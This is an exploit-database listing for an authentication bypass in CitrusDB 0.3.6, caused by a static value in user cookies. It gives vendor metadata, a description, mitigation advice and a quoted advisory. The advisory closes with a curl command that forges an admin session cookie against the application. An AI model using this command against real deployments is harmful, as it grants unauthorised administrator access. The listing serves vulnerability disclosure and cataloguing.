header-logo
Suggest Exploit
vendor:
CitrusDB
by:
Unknown
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: CitrusDB
Affected Version From: CitrusDB 0.3.6
Affected Version To: Unknown
Patch Exists: No
Related CWE: Not provided
CPE: a:citrusdb_project:citrusdb:0.3.6
Metasploit:
Other Scripts:
Platforms Tested: Not provided
Unknown

CitrusDB Authentication Bypass Vulnerability

An attacker can exploit an authentication bypass vulnerability in CitrusDB by using a static value during the creation of user cookie information. This allows the attacker to log in as any existing user, including the 'admin' account.

Mitigation:

Upgrade to a patched version of CitrusDB. Implement proper input validation and authentication mechanisms.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12560/info

CitrusDB is reportedly affected by an authentication bypass vulnerability. This issue is due to the application using a static value during the creation of user cookie information.

An attacker could exploit this vulnerability to log in as any existing user, including the 'admin' account.

This issue is reported to affect CitrusDB 0.3.6; earlier versions may also be affected. 

curl -D - --cookie "id_hash=4b3b2c8666298ae9771e9b3d38c3f26e;
user_name=admin" http://www.example.com/citrusdb/tools/index.php 
cqrsecured